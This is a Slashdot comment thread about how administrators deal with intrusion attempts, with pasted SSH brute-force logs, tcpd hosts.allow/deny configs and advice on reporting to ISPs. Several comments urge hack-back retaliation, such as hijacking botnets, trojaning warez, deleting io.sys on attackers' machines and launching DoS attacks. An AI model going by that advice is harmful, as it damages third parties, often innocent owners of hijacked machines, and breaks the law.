
    2. Re:port scan != casing the joint by networkBoy · · Score: 1

      you are assuming too much.
      Ethics are well beyond "kidz with 1337 sk1llz" hope I leet'd that right...
      -nB

      --
      whois gawk date unzip strip find touch finger mount join nice man top fsck grep eject more yes exit umount sleep dump
    3. Re:port scan != casing the joint by Anonymous Coward · · Score: 0

      So it is only casing the joint when I try all the doors? Not just a few of them?

      Somehow I think if I try more then the obvious doors once each, then I will be rightfully accused of casing the joint.

    4. Re:port scan != casing the joint by Anonymous Coward · · Score: 0

      Heh... my index.html redirects to GOATSE.

  136. If you *can't* ignore it by buss_error · · Score: 1

    Then send the NOC or Abuse desk something like:

    "Ok, tell your user to knock it off, please. Thank you."

    --
    Necessity is the plea for every infringement of human freedom. It is the argument of tyrants; it is the creed of slaves.
  137. here by mattyrobinson69 · · Score: 1

    net send $THEIR_IP piss off

  138. Intruders - Share the knowledge by Candyman_JAC · · Score: 1

    You might not be able to do anything about these intrusions. But, you should share your firewall log file with other network admins by sending it to DShield.org. This is the Distributed Intrusion Detection System. For those who have never seen DShield.org, it maintains a list of IP addresses of known/suspected intruders. They can be direct abusers or zombies.

  139. Take advantage of being r00ted by Anonymous Coward · · Score: 1, Funny

    If they manage to get root on your box, they'll probably do one of several things once you clean up all of the root kit mess.

    If they put an irc bot on your server, you can steal their channels. They're practically giving you, someone they don't know, access to their botnet.

    If they set up a warez ftp, you can have some fun with them by putting trojans into their files. Since they've already saved you the time of putting warez on your computer, be sure to copy anything good first.

    If they're using your machine for DDOS floods, you may be able to hijack their DDOS network, use it against your enemies or competitors, and blame it on some dirty hackers.

    If they steal your database of credit card numbers, it's a sign that you should quit your job and find a new career.

  140. 'tracert'? by Anonymous Coward · · Score: 0

    windows idiot

    your box is already owned

    enjoi

  141. Post IPs! by Bobzibub · · Score: 3, Informative

    What the hell! Why not?

    Aug 12 05:08:28 pokey sshd[7534]: Illegal user test from ::ffff:203.186.65.92
    Aug 12 05:08:31 pokey sshd[7534]: Failed password for illegal user test from ::ffff:203.186.65.92 port 4570 ssh2
    Aug 12 10:51:33 pokey sshd[7615]: Illegal user test from ::ffff:217.115.83.1
    Aug 12 10:51:35 pokey sshd[7615]: Failed password for illegal user test from ::ffff:217.115.83.1 port 39378 ssh2
    Aug 12 10:51:39 pokey sshd[7617]: Illegal user guest from ::ffff:217.115.83.1
    Aug 12 10:51:41 pokey sshd[7617]: Failed password for illegal user guest from ::ffff:217.115.83.1 port 39462 ssh2
    Aug 12 10:51:48 pokey sshd[7619]: Illegal user admin from ::ffff:217.115.83.1
    Aug 12 10:51:50 pokey sshd[7619]: Failed password for illegal user admin from ::ffff:217.115.83.1 port 39609 ssh2
    Aug 12 10:51:54 pokey sshd[7621]: Illegal user admin from ::ffff:217.115.83.1
    Aug 12 10:51:57 pokey sshd[7621]: Failed password for illegal user admin from ::ffff:217.115.83.1 port 39742 ssh2
    Aug 12 10:52:01 pokey sshd[7623]: Illegal user user from ::ffff:217.115.83.1
    Aug 12 10:52:03 pokey sshd[7623]: Failed password for illegal user user from ::ffff:217.115.83.1 port 39878 ssh2
    Aug 12 10:52:10 pokey sshd[7625]: Failed password for root from ::ffff:217.115.83.1 port 40005 ssh2
    Aug 12 10:52:16 pokey sshd[7627]: Failed password for root from ::ffff:217.115.83.1 port 40145 ssh2
    Aug 12 10:52:23 pokey sshd[7629]: Failed password for root from ::ffff:217.115.83.1 port 40277 ssh2
    Aug 12 10:52:27 pokey sshd[7631]: Illegal user test from ::ffff:217.115.83.1
    Aug 12 10:52:29 pokey sshd[7631]: Failed password for illegal user test from ::ffff:217.115.83.1 port 40412 ssh2
    Aug 12 11:01:41 pokey sshd[7659]: Illegal user test from ::ffff:217.115.83.1
    Aug 12 11:01:44 pokey sshd[7659]: Failed password for illegal user test from ::ffff:217.115.83.1 port 49595 ssh2
    Aug 12 11:01:48 pokey sshd[7661]: Illegal user guest from ::ffff:217.115.83.1
    Aug 12 11:01:50 pokey sshd[7661]: Failed password for illegal user guest from ::ffff:217.115.83.1 port 49726 ssh2
    Aug 12 11:01:54 pokey sshd[7663]: Illegal user admin from ::ffff:217.115.83.1
    Aug 12 11:01:57 pokey sshd[7663]: Failed password for illegal user admin from ::ffff:217.115.83.1 port 49861 ssh2
    Aug 12 11:02:01 pokey sshd[7665]: Illegal user admin from ::ffff:217.115.83.1
    Aug 12 11:02:03 pokey sshd[7665]: Failed password for illegal user admin from ::ffff:217.115.83.1 port 49983 ssh2
    Aug 12 11:02:07 pokey sshd[7667]: Illegal user user from ::ffff:217.115.83.1
    Aug 12 11:02:10 pokey sshd[7667]: Failed password for illegal user user from ::ffff:217.115.83.1 port 50117 ssh2
    Aug 12 11:02:16 pokey sshd[7669]: Failed password for root from ::ffff:217.115.83.1 port 50257 ssh2
    Aug 12 11:02:22 pokey sshd[7671]: Failed password for root from ::ffff:217.115.83.1 port 50398 ssh2
    Aug 12 11:02:29 pokey sshd[7673]: Failed password for root from ::ffff:217.115.83.1 port 50546 ssh2
    Aug 12 11:02:33 pokey sshd[7675]: Illegal user test from ::ffff:217.115.83.1
    Aug 12 11:02:35 pokey sshd[7675]: Failed password for illegal user test from ::ffff:217.115.83.1 port 50678 ssh2
    Aug 12 12:23:19 pokey sshd[7703]: Illegal user test from ::ffff:202.129.52.50
    Aug 12 12:23:22 pokey sshd[7703]: Failed password for illegal user test from ::ffff:202.129.52.50 port 3258 ssh2
    Aug 12 12:23:26 pokey sshd[7705]: Illegal user guest from

    1. Re:Post IPs! by Snover · · Score: 1

      Welcome to the wonderful world of SSH brute-forcing.
      I get several of these a week.

      Please read the following ISC diary for more info:
      http://www.incidents.org/diary.php?date=2004-07-28
      (Under the header "More ssh password brute forcing")

      On a more serious note that is really irritating the hell out of me right now, what is wrong with RoadRunner's abuse department? I sent an IRCd log that clearly shows someone attempting to circumvent a k:line by using open proxies (which is against their TOS-- circumvention of network security) and the response they send me back is that they "don't monitor traffic" and "you should consider using one of the many available commercial products to restrict access to the Internet from or to your computer". Like they didn't even read the damn letter I sent.

      --

      [insert witty comment here]
  142. A long time ago... by Psx29 · · Score: 1

    I remember monitoring for netbus attacks with this software called netbuster, and I would e-mail the ISPs that someone was trying to attack my machine from their service and it may or may not be because the users machine is compromised. I would usually get an e-mail saying they informed the user and also thanking me for alerting them, and so maybe this same thing applies here?

  143. I feel bad. by Eric_Cartman_South_P · · Score: 1
    No need for a letter. I'm sorry. I'll stop.

    :-)

  144. There's no porn at http://example.com... by LordPixie · · Score: 2, Funny

    You apparently misstyped the URL of your porn server. Please resend.


    --LordPixie

    1. Re:There's no porn at http://example.com... by JWSmythe · · Score: 1

      Hehe.

      Much unlike the trolls on here, I won't generally send people off to porn sites.

      But if you'd like to, start at http://voyeurweb.com , and you can find references to our other sites.

      --
      Serious? Seriousness is well above my pay grade.
  145. Just Use Dshield by Anonymous Coward · · Score: 1, Informative

    Just submit your logs to dshield.org and they will forward your complaints to the proper admin.

  146. Re:port scan != casing the joint == Trespassing by Anonymous Coward · · Score: 0

    Casing the joint would be when you then attempt to connect to each open port in turn

    I disagree. Port scanning is trespassing and falls under the same difficulties as the physical manifestation of the law. Dealing with a neighbor who constantly runs his lawn mower two feet onto your property, kids taking short cuts across your back yard, etc. is unrealistic and nearly impossible to prosecute. Yea, we all knew the crazy neighbor who would hide in his yard waiting to catch one of us slipping through, but most people ignore it or recognize the futility of going after every single instance. And on the Internet, it is increasingly likely that you'll find a neighbor (ala Area 51) who finds it useful to cause you considerable inconvenience when you decide to trespass (as well as sufficient experience to cause you to never wish to repeat the experience). Unfortunately a random IP address just doesn't give you the same warning as do posted signs stating "Warning: Protected Facility. Trespass beyond this point is really a bad idea."

    However, as it becomes easier to trace the Internet equivalent of trespass (e.g. IPv6 and other mechanisms that reduce the ability to misrepresent your origination), the arms race will find balance once again. Just as zombies have automated the offense, expect the same in response that will provide aggressive reciprication from those who care about trespassers. Yes, much of this ability exists today but there is an ethical issue associated with launching a counter-DDoS when the verification of the origination address is not precise and exact.

    So don't pretend trespassing is acceptable. It may be overlooked... today... but you will eventually encounter a neighbor who may have the interest and resources to ruin your day/week/month/career/credit/FBI file.

  147. I once had a pop3 attacker by SirCrashALot · · Score: 1

    Someone tried like over 500 different usernames to get into my pop server. Too bad for them I only have like 3 users one, none of which are first names. Freaked the hell out of me at first. I also get the usual root connections to ssh and test and unknown.

    They don't bother me anymore, when I'm bored I send emails to netblock owners.

  148. tracert?? by rhaig · · Score: 0
    can usually tracert their ISP's


    tracert?? you're a windows geek?

    move along... nothing to see here....

    --
    "We are not tolerant people. We prefer drastically effective solutions"
    1. Re:tracert?? by Anonymous Coward · · Score: 0

      Exactly, thanks to good old MS-DOS filename limitations, still alive and kicking...

      I guess he uses the 'dir' command instead of 'ls' too.

      That reminds me of people saying "J.P.G" instead of "JPEG". (and TGA for Targa, ...)

  149. They aren't serious unless they get in. by Mustang+Matt · · Score: 1

    Figure out who they are and give them evil glares while in the cafeteria.

    I know I for one have accidently typed root for my login name on someone elses box on more than one occassion.

    --
    The man who trades freedom for security does not deserve nor will he ever receive either. - Benjamin Franklin
  150. Breaking in... by jskline · · Score: 3, Informative

    Apparently there is a lot of talk here about involving law enforcement, the law, etc.

    What a lot of you don't know, which I learned via hard knocks, was that unless you are a large corporate entity with gross yearly earnings in excess of $500k, there is NOTHING that you can do with any judge, law enforcement, or the FBI. They simply tell you to "deal with it".

    This is why the issues of hacking and open spam relays, and all the other jazz will never go away, because it's not profitable or should I say; "chargable" under current statutes.

    Good luck!

    --
    All content in this message is copyright (c) 2008. All rights reserved. RIAA is prohibited here.
    1. Re:Breaking in... by gcaseye6677 · · Score: 1

      Well, you know what that means, launch a counterattack! The hacker is probably not a large corporation either. Seriously, this is the type of situation that leads to vigilante justice; when someone knows that there is no legal course of action that can be taken. But if you really wanted to take legal action against someone who caused you harm on the internet, and that person were in your country, you could always file a civil suit. Large corporation or not, if you can document damages that are the fault of another person, you've got a good chance in civil court.

  151. The real value of a honeypot by DickBreath · · Score: 2, Insightful

    The real value of a honeypot is not a slap in the fact to the hacker.

    The real value is in observing what kinds of attacks are being uses, especially to see if any NEW type of attacks are being used that your real systems may not have been secured against.

    --

    I'll see your senator, and I'll raise you two judges.
  152. Applause by 2names · · Score: 1
    A digital "slap to the forehead"

    Awesome.

    --
    "I'm just here to regulate funkiness."
  153. DDOS of the SLASHDOT EFFECT by Anonymous Coward · · Score: 0

    Yeah but, But Tom Hudson didn't plan on dealing with the DDOS of the SLASHDOT EFFECT

  154. Set up a sting. by infosinger · · Score: 2, Interesting

    Why not create a honey pot that is weak enough for them to compromise it? Then you have evidence of a break in and the grounds to prosecute. Assuming you can identify the offender through the ISP you can make some serious threats with definite consequences.

  155. Can you all be more passive-aggressive, please? by CheeseTroll · · Score: 4, Insightful

    Of course you should make your box as secure as possible. Ignoring automated attack attempts is probably the wisest course of action, as well, otherwise you waste a lot of time and only draw more more attention to your network, making it a bigger target.

    But for those intrusion attempts that appear to have a human being on the other end, a virtual smack upside the head would do the world some good. If it's some script kiddie, then let them know their feeble attempts do not go unnoticed, and are by no means appreciated, and chances are they'll find something more constructive to do before they get themselves into real trouble. If it's someone more hardcore, well, I guess it won't matter either way.

    --
    A post a day keeps productivity at bay.
    1. Re:Can you all be more passive-aggressive, please? by Anonymous Coward · · Score: 0

      Windows supports remote message delivery, IIRC. Why not just automatically respond to any interactive communication with a popup that tells them to sod off?

    2. Re:Can you all be more passive-aggressive, please? by Thuktun · · Score: 1

      If it's someone more hardcore, well, I guess it won't matter either way.

      Or, it might give them a reason to concentrate on your systems to find a weakness, rather than moving on to an easier target.

    3. Re:Can you all be more passive-aggressive, please? by Anonymous Coward · · Score: 0

      I'd start worrying when the attacks stopped...

  156. Companies don't care. by dougmc · · Score: 4, Informative
    I've had problems with this a lot myself. Not intrusion attempts, but DDoS attacks. Apparantly people want my nickname on IRC, and think that hitting me with a DDoS attack until I drop off is an acceptable way of freeing it up for their own use. It's not so bad when they just go after my cable modem, but they've also gone after the place that I work at, even when I'm not IRCing from there at the time, and that's much much worse. Also, they often don't attack for the needed ten minutes -- I've had attacks going on for 15 hours, and perhaps even longer but at that point I had the ISP filter out the traffic for me.

    So, being a good guy, I never respond in kind (I could, but 1) it's wrong, 2) it affects more than just the target and 3) I don't feel like going to pound-me-in-the-ass prison), I just log every single packet I can, and when the attack is over find the worst offenders (typically the packets are not spoofed) and use Spamcop and whois to find the responsible parties for each one, and send them all an email.

    Many (most?) emails elicit an automatic response.

    Perhaps 10% get a personalized response, but usually this response says that I should contact the ISP of the offender (when in fact that's exactly what I'm doing.) Perhaps half of the responses I do get say they'll do something about it, which is good -- usually these are compromised drone/zombie machines, and need cleaning anyways.

    Quite often, the attacker is stupid enough to ping my machine from his home machine (so he can see how it's going), not thinking I'll notice that. When this happens, I can also email his home ISP, the people who really know who he is, and the people who can really hit him where it hurts. Except that they ignore my email too, and if they do email me back, they just tell me that the attack did not come from their ISP so they can't do anything, or there's no proof that the pinging is related to the attack.

    Phone calls are much more effective than emails, but you really need to make them during the attack for them to take them seriously. And often the attacks happen outside of business hours, so there's nobody to call. And they're very time consuming.

    Though I did succeed in nailing at least one guy. He was in Romania, and he messaged me a few weeks after the attack basically pleading with me that it wasn't him, but his brother using his computer. Apparantly the police (in Romania) were questioning him, and one of the things they showed him was my email. The police had never contacted me -- I'm guessing that my email was just one of many pieces of evidence they had against the guy. I felt a bit bad for him, but not that bad. Not that I had any control over what was happening to him at that point -- it was out of my hands the moment I sent my email.

    So, if it happens again, I'll do the same thing. I know it's not likely that anything substantial will come from my emails, but there's still a chance. Every time it happens, I know I nail at least some of his compromised machines, and have a chance at getting him. I'll win eventually -- either that, or he'll hit puberty, in which case we both win.

    1. Re:Companies don't care. by whoppers · · Score: 2, Funny

      As an ex-IRC addict, I learned the ping -t and other commands early on, and that a shell account could really whup up someone on a dialup, which was usually me. One time I did start pinging some dialup guy from a shell, when someone on the shell msg'd me asking what I was doing, I replied "none of your business" he replied "goodbye". Dialup and everything dropped as he was the admin. Oh the days of being young, dumb and full piss and vinegar, glad they're over.

  157. Trying every Email? by Farmbubba · · Score: 1

    I have someone trying every email address (jon@site.com, jim@site.com) looking for ones to spam (or maybe to spam from!). Is there any way to stop that one?

    1. Re:Trying every Email? by Anonymous Coward · · Score: 0

      I have someone trying every email address (jon@site.com, jim@site.com) looking for ones to spam (or maybe to spam from!). Is there any way to stop that one?

      ban them.

  158. Re: "Arabs are white people." by nusratt · · Score: 2, Funny

    "Arabs, technically, are caucasians. They're just curly haired, tanned white people. Not entirely unlike Italians."

    WTF? Italians are white people? ;-)

  159. Well not to sound too stupid But by eadint · · Score: 2, Insightful

    I thought that is why we have routers.
    My routers block all unused ports and use nat. i dont controll the web server so im not sure what goes on there. but i always believed that proper firewall and router configs can stop these kind of things before they start, please correct me if im wrong.

  160. Re:Tom Hudson's way by wiggling · · Score: 1
    Geocities' pathetic traffic limit is exceeded on that site, but I assume that this cached page is what you're referring to.

    It's really a shame that most intrusion attempts are worms or automated bots with no one to see the clever responses. For my own home system where I'm not running a real web server, I have a script on port 80 serve up a redirect to the Department of Homeland Security. >:-)

  161. hear hear by smittyman · · Score: 1

    I must admit that is probably one of the few things that might actualy work. How many virusses are there with attachments that MUST be opened before it works that are get spread beyond belief? People are naive and or just don't care. If they still don't know, get of the highway and make way...

    You'll hate me for it, I know, but why do we have T-shirts with "No, I will not fix your computer"??? Because we know why it got broken, again....

    --
    Message from god, Please logoff, rebooting the Universe
  162. Report it and be Nice by argoff · · Score: 4, Insightful

    Chances are that you are not being directly hacked, but automatically probed by a system already infected with a root-kit installed.

    There are alot of people out there who have no idea that their computer is infected with a root-kit and many would be greatfull to be told so.

  163. a day in the life... by bazooka_foo · · Score: 1

    Failed logins from these: admin/password from 217.115.83.1: 4 Time(s) admin/password from 61.1.96.124: 2 Time(s) guest/password from 217.115.83.1: 2 Time(s) guest/password from 61.1.96.124: 1 Time(s) root/password from 217.115.83.1: 6 Time(s) root/password from 61.1.96.124: 3 Time(s) test/password from 217.115.83.1: 4 Time(s) test/password from 61.1.96.124: 2 Time(s) user/password from 217.115.83.1: 2 Time(s) user/password from 61.1.96.124: 1 Time(s) Illegal users from these: admin/none from 217.115.83.1: 4 Time(s) admin/none from 61.1.96.124: 2 Time(s) admin/password from 217.115.83.1: 4 Time(s) admin/password from 61.1.96.124: 2 Time(s) guest/none from 217.115.83.1: 2 Time(s) guest/none from 61.1.96.124: 1 Time(s) guest/password from 217.115.83.1: 2 Time(s) guest/password from 61.1.96.124: 1 Time(s) test/none from 217.115.83.1: 4 Time(s) test/none from 61.1.96.124: 2 Time(s) test/password from 217.115.83.1: 4 Time(s) test/password from 61.1.96.124: 2 Time(s) user/none from 217.115.83.1: 2 Time(s) user/none from 61.1.96.124: 1 Time(s) user/password from 217.115.83.1: 2 Time(s) user/password from 61.1.96.124: 1 Time(s)

  164. I'm not impressed with this attitude. by cfalcon · · Score: 1

    What kind of attitude is "Bust them quick before they get smart", anyway?

    I don't even know if it counts as an intrusion if someone's idea is log on and ask your machine politely for root. Heck, you were the one that set up your machine to sit there and *listen* to such requests, and (probably) to ignore them.

    It's obviously malicious if they are actually trying real exploits, of course.

    Given the possibility of compromised machines, isn't it possible that many / most of the IPs recorded are not, in fact, the guilty party? What if you end up getting some innocent family in trouble (who maybe have one kid smart enough to have a finger pointed at him), because their machine got owned by someone across the world- and *that* control was established by a library computer, effectively untraceable to the original malefactor?

  165. Re:Somewhat offtopic, but how do people deal with by The+Angry+Mick · · Score: 1

    Well, a brutish way to make a point is to block all the whole of Comcast's addresses.

    Then, send a polite note to Comcast upper management (here's the list) letting them know what you've done, and why. Suggest that they visit your /. posts to see a very visible reference to their lack of customer service or concern for security. Explain how many people read Slashdot daily. Let them do the math on how many potential customers they risk alienating.

    --

    I'm not tense. I'm just terribly, terribly, alert.

  166. Oh come on... by Anonymous Coward · · Score: 0
    What needs to happen is that there needs to be a very basically written message: "Click here to keep people from taking over your computer" rather than the jargon laden crap that is there now.

    If it were that easy, don't you think we'd be doing it? These attacks are insidious things. If you're not willing to take the time to secure your machine (or at least recognize when it's been cracked and have the responsibility to take it offline), then you have no business operating on the internet.

    Parent is right. If you leave your box open and it is used to attack my server, it's completely reasonable for me to attempt to render your machine unusable.

  167. Hack back! by Anonymous Coward · · Score: 0

    I've found that most script kiddies aren't secure themselves. Deleting that io.sys file teaches them a few good lessons. And when it isn't a windows machine, send a dos attack.

  168. One (or Two) Solutions by not_hylas(+) · · Score: 1

    ... that is, if you're flush with cash ...

    http://www.forescout.com/activescout.html

    This is the only silver bullet I've found, I wish I had the megabucks needed to purchase one.

    Try the Demo Center ... pretty cool.

    Or,

    A very cool managed Linux backup (drop and forget) Mac and Win and you name it friendly.

    http://www.kamaradata.com/

    Saw this one in action a few days ago, it handles Mac resources and all, never have to even deal with the OS.

    VPN tunnels in a managed node config, and I think they're looking at XGrid (Xgrid) for Unix as an optional service.

    http://unu.novajo.ca/simple/archives/000022.html

    http://www.apple.com/acg/xgrid/

    --
    ~hylas
  169. Target's completely different now. by mellon · · Score: 1

    You could probably go in without feeling uncomfortable, and they actually sell pretty good stuff. Plus, in giving them business you're paying them back for not throwing the book at you way back when.

    I had some similar encounters with authority figures when I was a kid. Most of them weren't even intentional authority figures - just people who noticed I was out of line and stopped me from doing things I would have really regretted when I grew up and got a clue. It was embarrassing as hell at the time, but in retrospect I'm very grateful for what they did. Even mentioned one of them in the dedication to my book.

    1. Re:Target's completely different now. by whittrash · · Score: 1

      Remember, when it comes to kiddies, and script kiddies, it takes a village!

  170. The best thing is to ignore. by pclminion · · Score: 1
    Several points:

    1. The ISP usually will not care even if you report it.
    2. Chances are low that is actually the attacker's machine -- more likely they have compromised it and are using it as a stepping stone.
    3. If you try to retaliate, the kiddie may get pissed and DoS you.
    4. The feds don't give a fuck.

    Cracker kiddies are like hornets. They swarm, but unless you piss them off, they won't attack. And they're too stupid to get in the door. Ignore them.

  171. Re:firewall - allow only certain IPs access port 2 by Dr.+Manhattan · · Score: 1
    My SSH isn't exposed to the outside world at all until I talk to a server I wrote and do a challenge-response. Then SSH is exposed, for that IP address only. The client is simple enough to sit on a Palm Pilot - works even for an Internet cafe setup. Even then, SSH doesn't run on the standard port.

    I am very confident that the challenge-response is secure by design. No one's been able to find any kind of hole in it. It's theoretically possible to brute-force it, but most people can't wait until the sun burns out to hack in.

    --
    PHEM - party like it's 1997-2003!
  172. If you can rdns, then report it by Jack+Greenbaum · · Score: 1
    There is some linux hack that propgates via ssh right now. The signature is attempted ssh logins to accounts like "test" and "guest", and sometimes "root". I was able to reverse dns one of these to a Linux box run by the Linux club at a university in europe. I notified the university network admin, and asked for a reply. Within a day they said the box had been hacked, they pulled it off the network, and informed the admin of the box.

    Sometimes you can do something.

    -- Jack

  173. From the Snort FAQ by Anonymous Coward · · Score: 0

    This approach is not recommended.

  174. I want a honeypot-on-a-disc by Feanturi · · Score: 2, Interesting

    I think it would be neat to have a program that could be easily installed on a box, that would act as the firewall for the system. Traffic that a firewall would normally allow is passed normally. Traffic that would normally be dropped, such as a query to a port that is not open on the firewall, would not be dropped but instead be passed to the honeypot module of the program, and from there responded to in a way set by the user through a scripting interface.

    Example: You aren't running a telnet server on your box, so normally a connection attempt to port 23 would be dropped. Here you set your honeypot controls to engage a script that you have made (or that came pre-packaged with the software) showing them a fake login prompt that looks like whatever software you wish them to think you are using. Script appropriate responses to possible actions the hacker might try, based on what software they think you have. Let them appear to login with 'admin/admin' or whatever, and show them fake file directories and whatnot. Certain often-targetted files could be spoofed so the cracker can actually 'read' them and not be tipped off. Basically have the software fuck with them for awhile before revealing that "it's all been logged you luser, the Matrix has you, disconnect before things get worse"

    You could make a windows box look like anything else to mess with them, if your arsenal of scripts is deep enough. The program could come with a whole whack of pre-defined scripts, and users could create and upload new scripts to a website for others to install in their systems. And when someone installs and runs the program for the first time, they are *forced* to choose a computer name, OS, and other details, so that every out-of-the-box install of this thing doesn't look like every other one out there, making it less easy to detect.

    You'd have to make the main code smart enough to not bother if the intrustion appears to be a worm, otherwise such a machine would likely get pretty bogged down. I don't know how to do any of this, I would just like to have the software.

    Please? Somebody?

    1. Re:I want a honeypot-on-a-disc by greechneb · · Score: 1

      Try the honeynet project: http://www.honeynet.org/tools/cdrom/

  175. Intrusion detection by AndroidonPPC · · Score: 1

    someone might have suggested this already, but an automated script that does a whois on the ip from the appropriate internet number commitee (or whatever the hell you call them folks like arin, apnic, et al) and sends an email to the IP block's admin / abuse address would work. Mostly, these emails get ignored unless they start appearing in large volume (if someone is dumb enough to continue trying to intrude from the same ip block).

  176. Cliff, I've got two words for you: by Narcocide · · Score: 1

    Vigilante Justice

  177. Post the logs by Ardisson · · Score: 1

    Post the logs on a dedicated page, such as http://foo.com/intrusion_attempts/.

    No one likes to see its IP address attached with an intrusion attempt, indexed by Google, available for anyone who searches for this IP.

  178. Honest-to-God White Caucasians? by duck_prime · · Score: 1
    WTF? Italians are white people? ;-)
    They only count when needed to bump up the numbers for demographic reasons.

    Heck, once you let Italians in, it opens the door to considering Irish folks as white. Which is clearly bunk; they are Appaloosa at best. Freckles, you know.
  179. hosts files by i621148 · · Score: 2, Informative

    this will only suppress people trying to get into your various info servers (telnet, ftp etc...) you will still get the vast script kiddie assault every day on port 80. you can allow people you want to connect to you on vpn or other services by adding their static ip to the file.

    hosts.allow
    #
    # hosts.allow This file describes the names of the hosts which are
    # allowed to use the local INET services, as decided
    # by the '/usr/sbin/tcpd' server.
    #

    # Prevent those with no reverse DNS from connecting.
    ALL : PARANOID : RFC931 20 : deny

    # Allow anything from localhost. Note that an IP address (not a host
    # name) *MUST* be specified for portmap(8).
    ALL : 127.0.0.1 : allow
    # internal ip
    ALL : 192.168.1.100 : allow
    ALL : 192.168.1.200 : allow
    ALL : 192.168.1.201 : allow
    ALL : 192.168.1.202 : allow
    ALL : 192.168.1.203 : allow
    ALL : 192.168.1.204 : allow
    ALL : 192.168.1.205 : allow
    ALL : 192.168.1.206 : allow
    ALL : 192.168.1.207 : allow
    ALL : 192.168.1.208 : allow
    ALL : 192.168.1.209 : allow
    ALL : 192.168.1.210 : allow

    # other people you like go here
    ALL : 00.000.000.00 : allow

    # You need to be clever with finger; do _not_ backfinger!! You can easily
    # start a "finger war".
    fingerd : ALL \
    : spawn (echo Finger. | \ /usr/bin/mail -s "tcpd\: %u@%h[%a] fingered me!" root) & \
    : deny

    hosts.deny
    #
    # hosts.deny This file describes the names of the hosts which are
    # *not* allowed to use the local INET services, as decided
    # by the '/usr/sbin/tcpd' server.
    #
    # The portmap line is redundant, but it is left to remind you that
    # the new secure portmap uses hosts.deny and hosts.allow. In particular
    # you should know that NFS uses portmap!

    # The rest of the daemons are protected.
    ALL : ALL \
    : severity auth.info \
    : twist /bin/echo "Eat a dog poop. You are not welcome to use %d from %h..."

  180. Exceeding stupid by scruffyMark · · Score: 1
    All you're hitting is the most 'downstream' IP address. How many of these script kiddies do you suppose are attacking from their home computers, and how many from some poor unsuspecting home user's computer? Even if 75% of kiddies don't hide their tracks, you're still getting 25% innocent victims.

    Scaring some poor sucker who's already been owned once is not going to change things much.

    --

    What is the robbing of a bank, compared to the founding of a bank? -- Bertolt Brecht

    1. Re:Exceeding stupid by networkBoy · · Score: 1

      Granted, this may be a worry, but seing as usually I can tell if there is a person behind the console or if it's a zombie I think my ratio is a little better than that. Also, the zombie often doesn't realise there is a problem, once this prints out on their printer they'll be worried, hopefully enough to call up their local computer geek and have all the crap pulled off their PC. This is why I only pick on their printer (with the one exception) and not on the filesystem. If I'm wrong about the target IP then no absolute damage has been done.
      -nB

      --
      whois gawk date unzip strip find touch finger mount join nice man top fsck grep eject more yes exit umount sleep dump
  181. I TRACK THEM DOWN! by okrobpr · · Score: 1

    I work for an isp in Oklahoma. We have about 2,000 DSL customers right now and if we receive email or a call from a person telling us that 'This ip was hitting my firewall on this day at this time.' we check our logs, find out who they are and call them, send them an email or send them a letter. We don't just let it go. If you contact their isp then usually they should handle it from there.

  182. Ignore them. by mindstrm · · Score: 1

    Seriously.
    It's not causing you a problem. Don't waste time on them. If you like, keep logs, so you can backtrack later if something does happen.

    Your main concern is keeping things secure, not hunting down everyone who tries to gain unauthorized access.

    Further.. I think it still holds true that if you put up service that listen and answer publicly on the internet, you should expect people to try to use them, even for things like SSHD. It is completely within your technical means to prevent outsiders from being able to even connect to sshd to guess passwords... so rather than complain about it, do something about it.

  183. Analogies and reality. by mindstrm · · Score: 1

    You can run all the analogies you want, about how it's an attempted crime, and so on...

    After all, it is. Attempting to gain unauthorized access to a system IS a crime.

    But it's unrealistic to waste resources on something like this.. you should EXPECT people to try to log in through these remote services.. this is the internet. If you don't want people to even TRY to guess, don't put up the service in the first place. If you are confident that your system is secure, some attempts at access shouldn't bother you.

    Think of this more like a fortress in a hostile war zone than a house or car in an urban law-abiding suburb.

    The fact is if you start chasing down every little attempt, you waste a ton of your time to no real benefit. Spend that time making sure things are tight and secure.

  184. Programmable linux firewall? by shish · · Score: 1

    On a related note, I've been thinking about setting my firewall / router box to have some automated defence things, along the lines of "if the same IP opens >5 connections to port 22 per minute (ie they're probably brute forcing passwords), block them, traceroute them, and add the output to my 'attackers to check out' list" - any ideas how I'd go about this? Ideally I'd like a scriptable userspace daemon version of iptables, but I know not of any such thing...

    --
    I mod down anyone who says "I will be modded down for this", regardless of the rest of their comment
  185. adjusted analogy - public vs. private by scruffyMark · · Score: 2, Insightful
    As he pointed out - you're in the public IP space; any services you leave open without password or similar protection are implicitly public. And, even if you do have password protection, and e.g. a banner stating it's a private service, the initial connection attempt is legitimate, since they have to do that to read the banner.

    In the physical-analogy sense, it would be more akin to closing your restaurant without putting up the "closed" sign. When people walk by and try to open the door, you got no business being offended - they're attempting to take advantage of the public service you appear to be offering.

    And if you were really dumb and forgot to lock the door too, you've got no business being upset when they walk in and start wondering where the waiter is.

    --

    What is the robbing of a bank, compared to the founding of a bank? -- Bertolt Brecht

  186. Make money off-a it! by Anonymous Coward · · Score: 0

    Just thorw up some add banners on the page being spamed by the zombies which pay per page view. Collect some money off of that and use it to combat the problem (or just put it in the companies pocket, whatever:)

    --The Dude

  187. But this one did scale fine by scruffyMark · · Score: 1
    At her average low of 15 mins per day dealing with the problem manually or socially, the rate of intrusions only has to increase 32-fold before it takes up an entire 8-hour normal working day.

    That's mathematically correct, but completely unrelated to the observed behaviour of the real world.

    The attacks did not increase 3200%, they decreased 66%. The advantage of a human dealing with things, is that humans can change their plans as needed. If the attacks had increased 32-fold, the admin would presumably not have continued on that course of action. Since the actual effect was to decrease the attacks by an appreciable amount, presumably relatively efficiently in terms of the amount of time she spent at it, she was able to apply rational human judgement and decide to continue her approach.

    --

    What is the robbing of a bank, compared to the founding of a bank? -- Bertolt Brecht

  188. Before you LART, look dom up at rfc-ignorant.org. by iamcf13 · · Score: 1

    If the offending domain is on file at rfc-ignorant.org, sending an abuse report to them is a waste of time and resources.

    Blacklist the offenders instead. (which includes major players like aol.com, rr.com, and comcast.net)

    When enough people complain and 'jump ship' at the blacklisted domains, the income lost will motivate the 'powers that be' there to address the situation properly or else they will eventually go out of business.

  189. Send a message by NightStriker · · Score: 1

    Usually, this sign is found next to the rear entrances of people's homes, but it might work in this situation:

    Warning:
    Intruders will be shot
    Survivors will be shot again

  190. Try Fish/Google When Emailing Non-English ISPs by cmholm · · Score: 1
    Using non-idiomatic English when emailing non-English speaking ISPs usually works, since there's usually either someone in the office who can parse standard English, or they can get a pretty good translation outta the Fish or Google.

